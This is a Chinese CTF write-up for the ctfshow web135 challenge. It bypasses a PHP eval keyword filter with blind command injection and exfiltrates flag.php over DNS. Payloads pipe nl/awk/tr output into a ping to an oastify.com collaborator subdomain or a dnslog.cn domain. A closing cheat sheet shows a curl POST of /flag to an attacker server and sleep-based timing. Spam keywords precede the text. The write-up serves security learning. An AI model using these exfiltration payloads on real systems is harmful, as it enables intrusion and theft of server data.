网站建设pqiw技术支持 合肥网站建设

网站建设pqiw,技术支持 合肥网站建设,wordpress无广告视频,快三直播app下载平台PS:萌新ctfer的解题过程#xff0c;如有错误之处恳请师傅们指正 #xff08;本题为web133的进阶版#xff0c;基本过程可见ctfshow-web133#xff09; 一#xff1a;增强过滤 打开靶场#xff0c;可以看到正则里又过滤了好多东西#xff1a; error_reporting(0); hi…PS:萌新ctfer的解题过程如有错误之处恳请师傅们指正本题为web133的进阶版基本过程可见ctfshow-web133一增强过滤打开靶场可以看到正则里又过滤了好多东西error_reporting(0); highlight_file(__FILE__); //flag.php if($F $_GET[F]){ if(!preg_match(/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i, $F)){ eval(substr($F,0,6)); }else{ die(师傅们居然破解了前面的那就来一个加强版吧); } }其中这里就有我们之前用的curl说明这里HTTP 外带主动把文件内容 POST 到外部服务器不适用那么我们就可以换成DNS 外带把数据拼接到域名里通过 DNS 解析请求把数据发送出去。这种方式的最大优势是绕开很多环境限制比如没有curl/wget、服务器禁止出站 HTTP 请求但 DNS 请求通常不会被禁。二具体构造还是一样先给出我们的payload?F$F;ping nl flag.php|awk NR15|tr -cd a-zA-Z0-9-.a8jyvpll7rtaqerbtw8l8qp38uel2cq1.oastify.com1.总体结构最开始的?F$F;就是我们上传的F参数后面的所有都是F里面的内容。号是 URL 中空格的编码形式其中更为常见的是%20URL中空格是不允许直接出现的所以这里就用来表示一下而ping是Linux 的网络测试命令在这里的核心作用是触发 DNS 请求当执行ping xxx.oastify.com时操作系统会先向 DNS 服务器发送请求查询xxx.oastify.com的 IP 地址这就是 DNS 解析。而xxx正是我们从flag.php中提取的 flag 内容这样 DNS 服务器就会记录下这个包含 flag 的域名请求我们就能在 oastify 平台上看到 flag 了。后面的就是提取flag的核心命令了2.核心命令?F$F;ping nl flag.php|awk NR15|tr -cd a-zA-Z0-9-.coma8jyvpll7rtaqerbtw8l8qp38uel2cq1.oastify.com1.nl flag.php给文件的每一行添加行号nl是number lines的缩写中文叫 “行号打印命令”作用是读取文件内容给每一行加上行号 空格后输出。为什么用nl因为 CTF 中flag.php里的 flag 通常在某一行固定位置比如第 15 行加行号后才能用后续命令精准定位行号。注意这里的flag的行数是要自己一一试出来的可以在BP里的Reapeater更改2.awk NR15只提取第 15 行的内容awk是 Linux 中处理文本的核心工具能按行、按列解析文本内容功能非常强大NR是awk的内置变量代表当前处理的行号Number of Record。NR15是awk的条件判断意思是 “只处理行号等于 15 的那一行其他行都忽略”3.tr -cd a-zA-Z0-9-过滤掉非指定的字符tr是translate的缩写中文叫 “字符转换 / 过滤命令”主要用来替换、删除文本中的字符-c全称--complement意思是 “取反”即匹配不在指定字符集中的字符。-d全称--delete意思是 “删除”即删除匹配到的字符。a-zA-Z0-9-指定的字符集包括-短横线DNS 域名允许包含短横线0-9数字A-Z大写字母a-z小写字母组合起来的意思删除所有不在a-zA-Z0-9-范围内的字符只保留这个范围内的字符4.域名最后的域名是DNS 数据收集平台分配的专属子域名由 “唯一随机前缀 平台主域名” 组成。这个域名的核心作用是作为 DNS 请求的目标让平台记录包含 flag 内容的域名请求。三获取flag我们先将我们的payload直接在hackbar里输入这样后面转到BP里空格和反引号会自动转码避免兼容性问题。【开代理之后直接execute即可】然后我们发送到repeater模块直接send然后我们就可以在collaborator模块里看到部分flag内容这里没有大括号是因为我们把除了数字和字母以外的字符都去掉了但是不知道为什么字母有大写有小写的希望知道的师傅能帮我解惑注意这里我们找到的只是部分flag【提取的是第15行的内容】因此后面NR还要改成16得到第二部分flag如下我们将flag进行拼接就可以了但是总不可能说我将大写字母一个一个都改成小写字母吧那样还是太吃操作了所以这时候编程就有大用处了写一个简单的python转换大小写字母就可以了string.lower()就是将大写字母转成小写字母最后再加上我们的大括号得到最终flag就可以了。四其他方法看来其他师傅的wp,说也能用cp 和mv来绕过过滤?F$F; cp flag.php 2.txt后面再改成2.txt读取一下就行了然后我想着web133是不是也可以用这个方法去做然后去试了一下发现没用可能是文件权限问题或者文件访问限制等总之也算是拓展一下视野吧。还有一个是大菜鸡师傅用的是DNSlog看视频里构造的payload是这样的?F$F;ping nl flag.php|awk NR15|tr -cd a-z0-9-.2mseu1.dnslog.cn -c 1-c是ping命令的一个核心参数全称是count计数作用是指定ping命令发送的数据包数量。ping -c 1 域名/IP表示只给目标域名 / IP发送 1 个 ping 数据包发送完成后ping命令就会立即终止。如果不加-c参数在 Linux 系统中ping命令会一直持续发送数据包直到按CtrlC手动终止但是不知道为什么我做不出来一直没有显示希望有知道的师傅能解惑大菜鸡师傅说网站有问题五结语通过这道题我们了解了DNS外带将处理后的字符串作为子域名通过ping触发DNS解析请求在DNS日志平台查看请求记录获取flag以及通过尝试行号找到flag在哪里最后则是不同环境下对权限的限制【还是BurpSuite好用】面对无回显Blind漏洞获取数据的核心思路是想尽办法让目标服务器主动“告诉”我们。战术总结1. 首选HTTP带外OOB-HTTP· 条件目标服务器能出网且有curl、wget等工具。· 方法用curl -X POST -F file/flag http://your-server将文件内容POST到你的监听服务器。· 工具Burp Collaborator、nc监听、公网VPS。2. 次选DNS带外OOB-DNS· 条件HTTP被禁但DNS解析通常被放过。· 方法将数据作为子域名的一部分通过ping或nslookup触发DNS查询。· 工具Burp Collaborator、DNSLog.cn。3. 备选时间盲注Time-Based· 条件完全不出网。· 方法通过命令执行的延时sleep 5来逐位推断数据极其缓慢。选择原则优先尝试DNS因为它限制最少如果不成功再尝试HTTP。